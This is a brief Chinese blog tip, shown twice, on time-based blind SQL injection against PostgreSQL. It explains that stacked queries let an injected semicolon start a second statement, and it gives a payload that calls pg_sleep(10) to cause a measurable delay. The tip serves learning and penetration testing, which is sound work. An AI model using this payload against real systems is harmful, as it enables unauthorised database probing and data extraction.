postgresql支持堆叠查询,所以可以加入分号之后执行下一条语句,所以在注入的时候可以用
select * from a where b='注入点';;select pg_sleep(10);--
这样会有10秒的延迟,可以利用这点去盲注PostgreSQL
一个postgresql延时注入的tips
最新推荐文章于 2024-08-25 16:35:02 发布
postgresql支持堆叠查询,所以可以加入分号之后执行下一条语句,所以在注入的时候可以用
select * from a where b='注入点';;select pg_sleep(10);--
这样会有10秒的延迟,可以利用这点去盲注PostgreSQL